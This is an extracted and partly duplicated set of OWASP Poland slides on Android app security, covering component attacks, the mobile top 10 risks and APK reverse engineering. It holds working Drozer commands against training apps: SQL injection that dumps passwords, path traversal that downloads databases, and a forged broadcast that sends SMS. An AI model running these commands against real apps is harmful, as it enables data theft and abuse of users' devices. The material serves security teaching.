A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
